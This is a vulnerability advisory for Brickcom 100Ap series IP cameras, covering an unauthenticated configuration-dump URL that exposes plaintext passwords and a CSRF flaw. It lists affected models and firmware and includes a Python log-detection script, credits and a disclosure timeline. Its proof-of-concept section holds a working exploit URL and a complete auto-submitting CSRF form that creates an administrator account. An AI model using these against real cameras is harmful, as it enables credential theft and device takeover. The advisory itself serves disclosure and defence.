BRICKCOM
1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues (CWE-592) and Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3690. Cross Site Request Forgery (CWE-352), Permissions, Privileges, and Access Control (CWE-264) and Execution with Unnecessary Privileges (CWE-250)
3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It is possible that other models are affected, but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmware versions: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the following firmware versions you must be logged in as administrator to download this file, but the information is still in plain text: firmwareVersion=v3.1.0.8, v3.1.0.4
-CVE-2013-3690.
All firmware checked.
4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689: this allows the entire device configuration file to be downloaded by requesting the following URL (all data shown will be in plain text). No authentication is necessary.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________
The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***
4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation
CVE-2013-3690: CSRF is possible via the POST method.
Privilege escalation from a viewer user to an administrator user is also possible.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can attempt targeted attacks by sending a special CSRF vector. This allows web interface parameters to be manipulated.
The following request can exploit this vulnerability:
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
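Detection logic for both issues above, as an added example that is not part of the original advisory or of Brickcom's software. It assumes the camera sits behind a reverse proxy that writes Combined Log Format and records the HTTP auth user name; the function name, rule names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format, as written by a reverse proxy placed in front of the
# camera (assumption: the advisory does not describe the device's own logging).
LINE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def findings(lines, camera_hosts):
    """Return (rule, source, detail) tuples for requests matching the advisory."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path = url.path.lower()
        # CVE-2013-3689: configuration dump served to a request without credentials.
        if path == "/configfile.dump" and m["user"] == "-" and m["status"] == "200":
            hits.append(("config-dump-unauthenticated", m["src"], m["target"]))
        # CVE-2013-3690: POST to the user-management CGI that was launched
        # from a page on another origin (or carries no usable Referer).
        if path == "/cgi-bin/users.cgi" and m["method"] == "POST":
            ref_host = urlsplit(m["referer"]).hostname
            if ref_host not in camera_hosts:
                hits.append(("users-cgi-cross-origin-post", m["src"],
                             m["referer"] or "no referer"))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Jun/2013:10:01:02 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18342 "-" "curl/7.30"',
    '192.0.2.20 - admin [12/Jun/2013:10:05:11 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18342 "http://192.0.2.10/" "Mozilla/5.0"',
    '192.0.2.20 - viewer [12/Jun/2013:10:07:40 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 211 "http://example.test/page.html" "Mozilla/5.0"',
    '192.0.2.20 - admin [12/Jun/2013:10:09:00 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 211 "http://192.0.2.10/users.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in findings(SAMPLE, camera_hosts={"192.0.2.10"}):
        print(*hit, sep="\t")
```

A hit on the second rule from a viewer account deserves a follow-up check of the camera's user list for accounts that were not created by an administrator.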
5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: The student team notifies Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers that it agrees with some of the vulnerabilities, but thinks some of them are not correct.
(CVE-2013-3689, Authentication bypass and plain text information: after talking with the vendor, it looks like this bug is fixed after firmware 3.1.x.x, but the information is still shown in plain text, so they should fix this second one.)
-2013-06-03: The students check and communicate to Brickcom the details of the products and firmware versions affected by the vulnerabilities.
-2013-06-04: The vendor agrees with everything stated and reports that it will fix it as soon as possible.